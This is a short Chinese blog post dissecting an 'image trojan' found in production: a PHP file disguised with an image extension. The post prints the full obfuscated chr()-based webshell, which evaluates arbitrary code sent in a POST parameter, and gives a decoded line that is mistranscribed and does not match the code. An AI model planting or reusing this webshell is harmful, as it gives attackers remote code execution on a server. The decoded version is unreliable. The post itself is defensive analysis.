图片木马解析

日前生产环境爆出图片木马,于是拿下来解析了一下

首先图片木马不是图片,实际是已常见图片格式为后缀的代码文件,拿到图片木马后,使用文本编辑器打开,发现是这一段代码:

<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84). $_uU(91).$_uU(49).$_uU(93).$_uU(41). $_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?> 

通过查询ASCII码对照表,最终可阅读的形式为:

<?@create_function("",eval.l(PORT[1]))?>

嗯,eval注入攻击

但是生产环境是java运行环境,不是php。。。

发表评论

您的邮箱地址不会被公开。 必填项已用 * 标注